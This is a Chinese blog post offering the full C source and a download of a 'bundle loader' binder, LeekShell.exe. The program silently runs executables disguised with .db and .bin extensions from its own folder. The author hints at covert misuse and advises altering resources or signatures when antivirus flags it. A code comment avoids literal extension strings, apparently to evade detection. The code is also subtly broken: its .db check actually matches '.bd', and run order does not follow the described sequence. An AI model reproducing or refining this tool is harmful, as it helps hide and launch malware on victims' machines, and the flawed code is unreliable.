原创 应用程序 捆绑加载器
导读:这是一个简单的 捆绑加载器 附带源码当执行LeekShell.exe后 先扫描当前目录 .db 的文件并运行 后找当前目录 .bin 的文件再执行打开!.db和.bin文件都必须是可执行PE程序无论加载成功与否 都全程静默 不会弹窗提示至于怎么用,用来干嘛........自己发挥......另。如果报毒的话,修改资源或者签名!...
这是一个简单的 捆绑加载器使用VS2019编译 附带源码
当执行LeekShell.exe后
先扫描当前目录 .db 的文件并运行
后找当前目录 .bin 的文件再执行打开!
.db和.bin文件都必须是可执行PE程序
无论加载成功与否 都全程静默 不会弹窗提示
至于怎么用,用来干嘛........自己发挥......
另。如果报毒的话,修改资源或者签名!
源码如下:
#include <windows.h>
#include <shlwapi.h>
#include <strsafe.h>
// Run a PE image directly by full path. Extension association is irrelevant.
// szCmdLine may be NULL/empty.
static BOOL RunDirect(LPCWSTR szExePath, LPCWSTR szCmdLine, LPCWSTR szWorkDir)
{
STARTUPINFOW si;
PROCESS_INFORMATION pi;
ZeroMemory(&si, sizeof(si));
si.cb = sizeof(si);
ZeroMemory(&pi, sizeof(pi));
WCHAR szBuf[MAX_PATH * 4];
if (szCmdLine && szCmdLine[0])
StringCchPrintfW(szBuf, ARRAYSIZE(szBuf), L"\"%s\" %s", szExePath, szCmdLine);
else
StringCchPrintfW(szBuf, ARRAYSIZE(szBuf), L"\"%s\"", szExePath);
BOOL ok = CreateProcessW(szExePath, szBuf, NULL, NULL, FALSE,
0, NULL, szWorkDir, &si, &pi);
if (ok)
{
CloseHandle(pi.hThread);
CloseHandle(pi.hProcess);
}
return ok;
}
int WINAPI WinMain(HINSTANCE hInst, HINSTANCE hPrev, LPSTR lpCmd, int nShow)
{
// current exe directory
WCHAR szDir[MAX_PATH];
GetModuleFileNameW(NULL, szDir, MAX_PATH);
PathRemoveFileSpecW(szDir);
// convert ANSI command line to wide once
WCHAR szCmdW[MAX_PATH * 4];
if (lpCmd && lpCmd[0])
MultiByteToWideChar(CP_ACP, 0, lpCmd, -1, szCmdW, ARRAYSIZE(szCmdW));
else
szCmdW[0] = 0;
// scan every entry in the current directory
WCHAR szPattern[MAX_PATH];
StringCchPrintfW(szPattern, MAX_PATH, L"%s\\*", szDir);
WIN32_FIND_DATAW fd;
HANDLE hFind = FindFirstFileW(szPattern, &fd);
if (hFind == INVALID_HANDLE_VALUE)
return 0;
do
{
if (fd.dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY)
continue;
// extension check without hardcoding ".db" / ".bin" literal strings
const WCHAR* ext = wcsrchr(fd.cFileName, L'.');
if (!ext || ext[1] == 0)
continue;
BOOL isDb = (ext[1] == L'b' && ext[2] == L'd' && ext[3] == 0);
BOOL isBin = (ext[1] == L'b' && ext[2] == L'i' && ext[3] == L'n' && ext[4] == 0);
if (!isDb && !isBin)
continue;
WCHAR szPath[MAX_PATH];
StringCchPrintfW(szPath, MAX_PATH, L"%s\\%s", szDir, fd.cFileName);
// .db runs without arguments; .bin runs with the original command line
if (isDb)
RunDirect(szPath, NULL, szDir);
else
RunDirect(szPath, szCmdW, szDir);
} while (FindNextFileW(hFind, &fd));
FindClose(hFind);
return 0;
}捆绑加载器.zip
类型:压缩文件|已下载:0|下载方式:免费下载
立即下载
Hackyh'Blog版权声明:以上内容作者已申请原创保护,未经允许不得转载,侵权必究!授权事宜、对本内容有异议或投诉,敬请联系网站管理员,我们将尽快回复您,谢谢合作!

